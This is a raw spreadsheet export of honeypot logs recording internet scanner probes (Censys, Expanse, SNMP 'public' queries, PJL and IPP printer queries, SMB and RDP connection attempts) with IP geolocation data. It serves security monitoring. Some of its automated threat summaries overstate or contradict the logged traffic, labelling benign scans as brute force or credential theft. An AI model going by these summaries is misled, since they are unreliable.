'1 OPTIONS', 'from': 'Censys &lt;sip:censysinspect@censys.io&gt;', 'max-forwards': '70', 'to': '&lt;sip:test.echo@sip5060.net&gt;', 'via': 'SIP/2.0/UDP 127.0.0.1:5060;received=167.94.138.118;rport=46655'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash='}}&amp;&amp;{Data_POP3:{'args': '', 'cmd': 'STLS'}}&amp;&amp;{Data_SMB:Incoming connection (167.94.138.118,46570)}&amp;&amp;{Data_SIP:{'accept': 'application/sdp', 'call-id': 'a84b4c76e66710', 'content-length': '0', 'cseq': '1 OPTIONS', 'from': 'Censys &lt;sip:censysinspect@censys.io&gt;', 'max-forwards': '70', 'to': '&lt;sip:test.echo@sip5060.net&gt;', 'via': 'SIP/2.0/UDP 127.0.0.1:5060;received=167.94.138.118;rport=41479'}}&amp;&amp;{Data_SIP:{'accept': 'application/sdp', 'call-id': 'a84b4c76e66710', 'content-length': '0', 'cseq': '1 OPTIONS', 'from': 'Censys &lt;sip:censysinspect@censys.io&gt;', 'max-forwards': '70', 'to': '&lt;sip:test.echo@sip5060.net&gt;', 'via': 'SIP/2.0/UDP 127.0.0.1:5060;received=167.94.138.118;rport=53431'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '194.4.48.242', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '194.4.48.242', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'GET', 'uri': '/favicon.ico'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '103.211.202.140:8443', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'GET', 'uri': '/version'}}&amp;&amp;{Data_IPP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Content-Length': '147', 'Content-Type': 'application/ipp', 'Host': '109.123.229.33:631', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'POST', 'uri': '/ipp'}}&amp;&amp;{Data_IPP:{'request': 'VERSION 2.1|REQUEST 0x1|OPERATION Get-Printer-Attributes|GROUP operation-attributes-tag|ATTR attributes-charset utf-8|ATTR attributes-natural-language en-us|ATTR printer-uri ipp://109.123.229.33:631/ipp|ATTR requested-attributes all'}}&amp;&amp;{Data_HTTPS:{'Host': '5.181.21.224:443', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '5.181.21.224', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '5.181.21.224', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'GET', 'uri': '/favicon.ico'}}&amp;&amp;{Data_SMB:Incoming connection (167.94.138.118,54320)}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '193.57.136.113', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '193.57.136.113', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'GET', 'uri': '/favicon.ico'}}&amp;&amp;{Data_HTTP:{'Host': '144.126.148.5:80', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '144.126.148.5', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_IRC:{'command': 'x10x12 x04MQTTx04  ', 'params': '[]', 'prefix': ''}}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_PJL:{'command': '@PJL INFO STATUS_x000D_
'}}&amp;&amp;{Data_PJL:{'command': 'version_x000D_
'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '66.94.127.183', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '66.94.127.183', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'GET', 'uri': '/favicon.ico'}}&amp;&amp;{Data_IPP:{'request': 'VERSION 2.1|REQUEST 0x1|OPERATION Get-Printer-Attributes|GROUP operation-attributes-tag|ATTR attributes-charset utf-8|ATTR attributes-natural-language en-us|ATTR printer-uri ipp://38.60.209.6:631/ipp|ATTR requested-attributes all'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '144.126.148.5', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '144.126.148.5', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'GET', 'uri': '/favicon.ico'}}&amp;&amp;{Data_HTTP:{'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '144.126.148.5', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'GET', 'uri': '/favicon.ico'}}&amp;&amp;{Data_SIP:{'accept': 'application/sdp', 'call-id': 'a84b4c76e66710', 'content-length': '0', 'cseq': '1 OPTIONS', 'from': 'Censys &lt;sip:censysinspect@censys.io&gt;', 'max-forwards': '70', 'to': '&lt;sip:test.echo@sip5060.net&gt;', 'via': 'SIP/2.0/UDP 127.0.0.1:5060;received=167.94.138.118;rport=54413'}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO STATUS_x000D_
'}}&amp;&amp;{Data_PJL:{'command': 'GET / HTTP/1.1_x000D_
Host: 154.93.37.45:9100_x000D_
_x000D_
'}}&amp;&amp;{Data_PJL:{'command': '*IDN?
'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '94.131.97.67', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '94.131.97.67', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'GET', 'uri': '/favicon.ico'}}&amp;&amp;{Data_IPP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Content-Length': '146', 'Content-Type': 'application/ipp', 'Host': '66.94.127.183:631', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'POST', 'uri': '/ipp'}}&amp;&amp;{Data_SMB:Incoming connection (167.94.138.118,43124)}&amp;&amp;{Data_SMB:Incoming connection (167.94.138.118,56834)}&amp;&amp;{Data_SMB:Incoming connection (167.94.138.118,60910)}&amp;&amp;{Data_IPP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Content-Length': '144', 'Content-Type': 'application/ipp', 'Host': '5.180.55.39:631', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'POST', 'uri': '/ipp'}}&amp;&amp;{Data_IPP:{'request': 'VERSION 2.1|REQUEST 0x1|OPERATION Get-Printer-Attributes|GROUP operation-attributes-tag|ATTR attributes-charset utf-8|ATTR attributes-natural-language en-us|ATTR printer-uri ipp://5.180.55.39:631/ipp|ATTR requested-attributes all'}}&amp;&amp;{Data_IRC:{'command': 'x10x12 x04MQTTx04  ', 'params': '[]', 'prefix': ''}}&amp;&amp;{Data_IPP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Content-Length': '146', 'Content-Type': 'application/ipp', 'Host': '154.90.63.129:631', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'POST', 'uri': '/ipp'}}&amp;&amp;{Data_IPP:{'request': 'VERSION 2.1|REQUEST 0x1|OPERATION Get-Printer-Attributes|GROUP operation-attributes-tag|ATTR attributes-charset utf-8|ATTR attributes-natural-language en-us|ATTR printer-uri ipp://154.90.63.129:631/ipp|ATTR requested-attributes all'}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO STATUS_x000D_
'}}&amp;&amp;{Data_PJL:{'command': 'GET / HTTP/1.1_x000D_
Host: 103.211.202.140:9100_x000D_
_x000D_
'}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO STATUS_x000D_
'}}&amp;&amp;{Data_IPP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Content-Length': '146', 'Content-Type': 'application/ipp', 'Host': '45.14.244.111:631', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'POST', 'uri': '/ipp'}}&amp;&amp;{Data_IPP:{'request': 'VERSION 2.1|REQUEST 0x1|OPERATION Get-Printer-Attributes|GROUP operation-attributes-tag|ATTR attributes-charset utf-8|ATTR attributes-natural-language en-us|ATTR printer-uri ipp://45.14.244.111:631/ipp|ATTR requested-attributes all'}}&amp;&amp;{Data_IPP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Content-Length': '146', 'Content-Type': 'application/ipp', 'Host': '156.244.37.11:631', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'POST', 'uri': '/ipp'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '38.54.42.176', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'GET', 'uri': '/'}}</t>
  </si>
  <si>
    <t>::ffff:a75e:8a76</t>
  </si>
  <si>
    <t>Based on the protocol syntax, it appears that an attacker is attempting to exploit multiple services and protocols to gain unauthorized access or gather sensitive information. &amp;&amp; This indicates an attempt to access Oracle database management system, suggesting a potential SQL injection or unauthorized database access attempt. The absence of further information suggests the malicious actor may be probing for vulnerabilities. Further investigation is required to determine the intent behind this action. &amp;&amp; No login attempts detected via SMTP service, indicating potential reconnaissance or probing activity to identify vulnerable services. This could be an initial step by malicious actors before attempting to exploit the system further. No actual malicious activity has occurred yet but there is potential for future exploitation. &amp;&amp; The data indicates that an unknown party attempted to access IMAP services without success, suggesting potential reconnaissance or scanning activity for vulnerabilities. The absence of specific information may indicate the entity was simply probing or trying to find a valid connection. This could be a precursor to more malicious activity.</t>
  </si>
  <si>
    <t>The attacker seems to be scanning for vulnerable systems, attempting to crack passwords, and gathering credentials. They are also trying to establish a connection to various services such as FTP, HTTP, HTTPS, POP3, SMTP, and more. &amp;&amp; Brute Force</t>
  </si>
  <si>
    <t>86381c79308d52138d49536b1f83f545</t>
  </si>
  <si>
    <t>125.141.72.172</t>
  </si>
  <si>
    <t>Gwanak-gu</t>
  </si>
  <si>
    <t>Jowon-dong</t>
  </si>
  <si>
    <t>6572030</t>
  </si>
  <si>
    <t>151-018</t>
  </si>
  <si>
    <t>37.4828</t>
  </si>
  <si>
    <t>126.908</t>
  </si>
  <si>
    <t>Sudogwonseobubonbu</t>
  </si>
  <si>
    <t>::ffff:7d8d:48ac</t>
  </si>
  <si>
    <t>No TELNET activity detected, but logs indicate potential attempted access to service. This could be indicative of reconnaissance or probing by an attacker. Service is currently unavailable for connection attempts. &amp;&amp; No suspicious TELNET activity detected, as Data_TELNET is marked as Not Available (NA).</t>
  </si>
  <si>
    <t>Port Scan &amp;&amp; Brute Scan</t>
  </si>
  <si>
    <t>45284dd3a09a8a91d083ba40eb9e9ceb</t>
  </si>
  <si>
    <t>194.187.176.176</t>
  </si>
  <si>
    <t>SMA-LAB_SMTP_HC1&amp;&amp;SMA-LAB_SNMP_H28</t>
  </si>
  <si>
    <t>25&amp;&amp;161&amp;&amp;3389&amp;&amp;110&amp;&amp;443&amp;&amp;5900</t>
  </si>
  <si>
    <t>connection&amp;&amp;query&amp;&amp;GET&amp;&amp;stshash</t>
  </si>
  <si>
    <t>{Data_SMTP:{'arg': 'None', 'command': 'STARTTLS', 'data': 'None'}}&amp;&amp;{Data_SNMP:NA}&amp;&amp;{Data_SNMP:{'community': 'UnKnown', 'oids': 'UnKnown', 'version': 'UnKnown'}}&amp;&amp;{Data_RDP:NA}&amp;&amp;{Data_POP3:NA}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Accept-Language': 'en;q=0.7,en-US;q=0.3', 'Cache-Control': 'no-cache', 'Connection': 'keep-alive', 'Host': '5.182.38.84', 'Pragma': 'no-cache', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:65.0) Gecko/20100101 Firefox/65.0', 'method': 'GET', 'uri': '/favicon.ico'}}&amp;&amp;{Data_HTTPS:NA}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=root'}}&amp;&amp;{Data_VNC:NA}</t>
  </si>
  <si>
    <t>::ffff:c2bb:b0b0</t>
  </si>
  <si>
    <t>528f1002d72097568ca8f7097ba5de22</t>
  </si>
  <si>
    <t>172.81.62.246</t>
  </si>
  <si>
    <t>unassigned.172-81-62-246.spryt.net&amp;&amp;NA</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_VNC_H2&amp;&amp;SMA-LAB_VNC_HC1&amp;&amp;SMA-LAB_MT-CPA_H45&amp;&amp;SMA-LAB_VNC_H9&amp;&amp;SMA-LAB_VNC_H36&amp;&amp;SMA-LAB_VNC_H44&amp;&amp;SMA-LAB_VNC_H45&amp;&amp;SMA-LAB_VNC_H34&amp;&amp;SMA-LAB_VNC_H18&amp;&amp;SMA-LAB_VNC_H19&amp;&amp;SMA-LAB_VNC_H32&amp;&amp;SMA-LAB_VNC_H5&amp;&amp;SMA-LAB_VNC_H15&amp;&amp;SMA-LAB_VNC_H7&amp;&amp;SMA-LAB_VNC_H26&amp;&amp;SMA-LAB_VNC_H24&amp;&amp;SMA-LAB_VNC_H40&amp;&amp;SMA-LAB_VNC_H12&amp;&amp;SMA-LAB_VNC_H11&amp;&amp;SMA-LAB_VNC_H27&amp;&amp;SMA-LAB_VNC_H14&amp;&amp;SMA-LAB_VNC_H41&amp;&amp;SMA-LAB_VNC_H17&amp;&amp;SMA-LAB_MT-CPA_H41&amp;&amp;SMA-LAB_VNC_H47&amp;&amp;SMA-LAB_VNC_H8&amp;&amp;SMA-LAB_VNC_H13&amp;&amp;SMA-LAB_VNC_H33&amp;&amp;SMA-LAB_MT-CPA_H28&amp;&amp;SMA-LAB_VNC_H31&amp;&amp;SMA-LAB_MT-CPA_H11&amp;&amp;SMA-LAB_MT-CPA_H27&amp;&amp;SMA-LAB_VNC_H29</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;5900&amp;&amp;20483&amp;&amp;52860&amp;&amp;56791&amp;&amp;60978&amp;&amp;53415&amp;&amp;59263&amp;&amp;56116&amp;&amp;62009&amp;&amp;55769&amp;&amp;59491&amp;&amp;53301&amp;&amp;63086&amp;&amp;56206&amp;&amp;53066&amp;&amp;52439&amp;&amp;55112&amp;&amp;58316&amp;&amp;57952&amp;&amp;62247&amp;&amp;61035&amp;&amp;64707&amp;&amp;65302</t>
  </si>
  <si>
    <t>::ffff:ac51:3ef6</t>
  </si>
  <si>
    <t>a3e30e14c1995191eb128329c8ade1f2</t>
  </si>
  <si>
    <t>23.234.90.116</t>
  </si>
  <si>
    <t>Toronto</t>
  </si>
  <si>
    <t>Toronto (Scarborough)</t>
  </si>
  <si>
    <t>6167865</t>
  </si>
  <si>
    <t>M1K</t>
  </si>
  <si>
    <t>43.735</t>
  </si>
  <si>
    <t>-79.2579</t>
  </si>
  <si>
    <t>11878</t>
  </si>
  <si>
    <t>TZULO</t>
  </si>
  <si>
    <t>tzulo</t>
  </si>
  <si>
    <t>Desi Iptv Inc</t>
  </si>
  <si>
    <t>::ffff:17ea:5a74</t>
  </si>
  <si>
    <t>69d9216733774f560a25799aed47b7e0</t>
  </si>
  <si>
    <t>117.205.151.207</t>
  </si>
  <si>
    <t>::ffff:75cd:97cf</t>
  </si>
  <si>
    <t>494ae1effc62a3c8da3e0e7e9fe5d95c</t>
  </si>
  <si>
    <t>51.255.50.116</t>
  </si>
  <si>
    <t>vps-92c07d09.vps.ovh.net&amp;&amp;NA</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_MT-CPA_H5&amp;&amp;SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_MSSQL_H34&amp;&amp;SMA-LAB_MSSQL_H25</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;589&amp;&amp;1433&amp;&amp;NA</t>
  </si>
  <si>
    <t>HDF</t>
  </si>
  <si>
    <t>Hauts-de-France</t>
  </si>
  <si>
    <t>Roubaix</t>
  </si>
  <si>
    <t>2982681</t>
  </si>
  <si>
    <t>59100</t>
  </si>
  <si>
    <t>50.6917</t>
  </si>
  <si>
    <t>3.2015700000000002</t>
  </si>
  <si>
    <t>OVH</t>
  </si>
  <si>
    <t>::ffff:33ff:3274</t>
  </si>
  <si>
    <t>8468b6454c7c7f3ed2abf2b28858944c</t>
  </si>
  <si>
    <t>81.16.124.251</t>
  </si>
  <si>
    <t>SMA-LAB_SMB_H8&amp;&amp;SMA-LAB_SMB_H27&amp;&amp;SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_MSSQL_H13&amp;&amp;SMA-LAB_SMB_H46&amp;&amp;SMA-LAB_MSSQL_H8&amp;&amp;SMA-LAB_SMB_H30&amp;&amp;SMA-LAB_MSSQL_H5&amp;&amp;SMA-LAB_MSSQL_H46</t>
  </si>
  <si>
    <t>445&amp;&amp;1433&amp;&amp;NA</t>
  </si>
  <si>
    <t>TIC</t>
  </si>
  <si>
    <t>Telecommunication Company of Tehran</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_SMB:Incoming connection (81.16.124.251,62268)}&amp;&amp;{Data_SMB:Incoming connection (81.16.124.251,62315)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (81.16.124.251,58224)}&amp;&amp;{Data_SMB:Incoming connection (81.16.124.251,64527)}&amp;&amp;{Data_SMB:Incoming connection (81.16.124.251,63195)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (81.16.124.251,62341)}&amp;&amp;{Data_SMB:Incoming connection (81.16.124.251,62285)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (81.16.124.251,54609)}&amp;&amp;{Data_SMB:Incoming connection (81.16.124.251,55237)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (81.16.124.251,17502)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (81.16.124.251,14951)}&amp;&amp;{Data_SMB:Incoming connection (81.16.124.251,14967)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (81.16.124.251,30231)}&amp;&amp;{Data_SMB:Incoming connection (81.16.124.251,59614)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}</t>
  </si>
  <si>
    <t>::ffff:5110:7cfb</t>
  </si>
  <si>
    <t>There is insufficient information to analyze any potential malicious activity. No log data was provided for analysis, making it impossible to determine any suspicious behavior.</t>
  </si>
  <si>
    <t>db5f25a2d2793b49ca208f721c7dc342</t>
  </si>
  <si>
    <t>172.81.62.222</t>
  </si>
  <si>
    <t>unassigned.172-81-62-222.spryt.net&amp;&amp;NA</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_VNC_H29&amp;&amp;SMA-LAB_VNC_H10&amp;&amp;SMA-LAB_VNC_H27&amp;&amp;SMA-LAB_VNC_HC1&amp;&amp;SMA-LAB_MT-CPA_H46&amp;&amp;SMA-LAB_VNC_H36&amp;&amp;SMA-LAB_VNC_H14&amp;&amp;SMA-LAB_VNC_H45&amp;&amp;SMA-LAB_VNC_H11&amp;&amp;SMA-LAB_VNC_H40&amp;&amp;SMA-LAB_VNC_H41&amp;&amp;SMA-LAB_VNC_H34&amp;&amp;SMA-LAB_VNC_H9&amp;&amp;SMA-LAB_VNC_H15&amp;&amp;SMA-LAB_VNC_H24&amp;&amp;SMA-LAB_VNC_H25&amp;&amp;SMA-LAB_VNC_H12&amp;&amp;SMA-LAB_VNC_H26&amp;&amp;SMA-LAB_VNC_H7&amp;&amp;SMA-LAB_VNC_H44&amp;&amp;SMA-LAB_VNC_H8&amp;&amp;SMA-LAB_MT-CPA_H7&amp;&amp;SMA-LAB_VNC_H33&amp;&amp;SMA-LAB_VNC_H22&amp;&amp;SMA-LAB_VNC_H47&amp;&amp;SMA-LAB_VNC_H37&amp;&amp;SMA-LAB_MT-CPA_H28&amp;&amp;SMA-LAB_MT-CPA_H34</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;5900&amp;&amp;12599&amp;&amp;53619&amp;&amp;63756&amp;&amp;53262&amp;&amp;54105&amp;&amp;49473&amp;&amp;59117&amp;&amp;49731&amp;&amp;60850&amp;&amp;60287&amp;&amp;50723&amp;&amp;52054&amp;&amp;63238&amp;&amp;58660&amp;&amp;51179&amp;&amp;62002&amp;&amp;52677&amp;&amp;51727&amp;&amp;58702&amp;&amp;58471</t>
  </si>
  <si>
    <t>::ffff:ac51:3ede</t>
  </si>
  <si>
    <t>The data indicates that an attempt was made to access a VNC service but it failed, suggesting a potential brute-force or reconnaissance activity.</t>
  </si>
  <si>
    <t>a9563385482492a2e33bf07485de3669</t>
  </si>
  <si>
    <t>198.235.24.50</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_SSH_H11&amp;&amp;SMA-LAB_HTTP_H14&amp;&amp;SMA-LAB_PJL_H40&amp;&amp;SMA-LAB_SSH_H13&amp;&amp;SMA-LAB_IMAP_H31&amp;&amp;SMA-LAB_POSTGRES_H8&amp;&amp;SMA-LAB_FTP_H15&amp;&amp;SMA-LAB_MT-CPA_H18&amp;&amp;SMA-LAB_IRC_H7&amp;&amp;SMA-LAB_SMB_H14&amp;&amp;SMA-LAB_HTTP_H16&amp;&amp;SMA-LAB_SIP_H7&amp;&amp;SMA-LAB_RDP_H38&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_MT-CPA_H46&amp;&amp;SMA-LAB_LDAP_H34&amp;&amp;SMA-LAB_LDAP_H22&amp;&amp;SMA-LAB_POP3_H34&amp;&amp;SMA-LAB_RDP_H34&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_SNMP_H16&amp;&amp;SMA-LAB_SMB_H2&amp;&amp;SMA-LAB_IMAP_H44&amp;&amp;SMA-LAB_HTTP_H12&amp;&amp;SMA-LAB_IMAP_H13&amp;&amp;SMA-LAB_PJL_H15&amp;&amp;SMA-LAB_PJL_H39&amp;&amp;SMA-LAB_LDAP_H13&amp;&amp;SMA-LAB_SOCKS5_H8&amp;&amp;SMA-LAB_SOCKS5_H5&amp;&amp;SMA-LAB_LDAP_H30&amp;&amp;SMA-LAB_IMAP_H18&amp;&amp;SMA-LAB_RDP_H29&amp;&amp;SMA-LAB_SNMP_H45&amp;&amp;SMA-LAB_ORACLE_H19&amp;&amp;SMA-LAB_IMAP_H30&amp;&amp;SMA-LAB_POP3_H25&amp;&amp;SMA-LAB_POP3_H32&amp;&amp;SMA-LAB_ORACLE_H32&amp;&amp;SMA-LAB_ORACLE_H9&amp;&amp;SMA-LAB_SNMP_H29&amp;&amp;SMA-LAB_SOCKS5_H21&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_IMAP_H27&amp;&amp;SMA-LAB_POSTGRES_H12&amp;&amp;SMA-LAB_PJL_H38&amp;&amp;SMA-LAB_RDP_H42&amp;&amp;SMA-LAB_IMAP_H45&amp;&amp;SMA-LAB_IRC_H18&amp;&amp;SMA-LAB_IMAP_H23&amp;&amp;SMA-LAB_SNMP_H21&amp;&amp;SMA-LAB_HTTP_H8&amp;&amp;SMA-LAB_SNMP_H19&amp;&amp;SMA-LAB_LDAP_HC1&amp;&amp;SMA-LAB_REDIS_H14&amp;&amp;SMA-LAB_RDP_H21&amp;&amp;SMA-LAB_POSTGRES_H22&amp;&amp;SMA-LAB_MYSQL_H38&amp;&amp;SMA-LAB_REDIS_H44&amp;&amp;SMA-LAB_SNMP_H36&amp;&amp;SMA-LAB_PJL_H17&amp;&amp;SMA-LAB_PJL_H46&amp;&amp;SMA-LAB_NTP_H14&amp;&amp;SMA-LAB_RDP_H9&amp;&amp;SMA-LAB_FTP_H23&amp;&amp;SMA-LAB_MSSQL_H21&amp;&amp;SMA-LAB_RDP_H18&amp;&amp;SMA-LAB_LDAP_H17&amp;&amp;SMA-LAB_ORACLE_H5&amp;&amp;SMA-LAB_SNMP_H7&amp;&amp;SMA-LAB_MT-CPA_H5&amp;&amp;SMA-LAB_HTTP_H10&amp;&amp;SMA-LAB_SOCKS5_H17&amp;&amp;SMA-LAB_IMAP_H37&amp;&amp;SMA-LAB_FTP_H6&amp;&amp;SMA-LAB_SIP_H24&amp;&amp;SMA-LAB_LDAP_H32</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;22&amp;&amp;80&amp;&amp;9100&amp;&amp;143&amp;&amp;5432&amp;&amp;21&amp;&amp;55635&amp;&amp;6667&amp;&amp;445&amp;&amp;NA&amp;&amp;3389&amp;&amp;23&amp;&amp;50343&amp;&amp;110&amp;&amp;161&amp;&amp;1080&amp;&amp;1521&amp;&amp;6379&amp;&amp;3306&amp;&amp;1433&amp;&amp;56288&amp;&amp;443&amp;&amp;389&amp;&amp;50020&amp;&amp;50854&amp;&amp;49441&amp;&amp;50580&amp;&amp;5900&amp;&amp;49842&amp;&amp;49158&amp;&amp;49493</t>
  </si>
  <si>
    <t>connection&amp;&amp;query&amp;&amp;command&amp;&amp;GET&amp;&amp;request&amp;&amp;NA&amp;&amp;stshash</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_LDAP:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000D_
_x000D_
'}}&amp;&amp;{Data_MYSQL:NA}&amp;&amp;{Data_IMAP:NA}&amp;&amp;{Data_IMAP:{'cmd': 'CAPABILITY', 'data': 'None', 'tag': 'a001'}}&amp;&amp;{Data_SMB:Incoming connection (198.235.24.50,58096)}&amp;&amp;{Data_SMB:Incoming connection (198.235.24.50,58102)}&amp;&amp;{Data_SMB:Incoming connection (198.235.24.50,58108)}&amp;&amp;{Data_HTTPS:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'User-Agent': 'Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers&amp;#39; presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_SOCKS5:NA}&amp;&amp;{Data_FTP:NA}&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_RDP:NA}&amp;&amp;{Data_REDIS:NA}&amp;&amp;{Data_SIP:NA}&amp;&amp;{Data_ORACLE:NA}&amp;&amp;{Data_SNMP:NA}&amp;&amp;{Data_SNMP:{'community': 'public', 'oids': '1.3.6.1.2.1.1.1.0', 'version': '0'}}&amp;&amp;{Data_SNMP:{'community': 'public', 'oids': '1.3.6.1.2.1', 'version': '1'}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000D_
_x000D_
'}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000D_
_x000D_
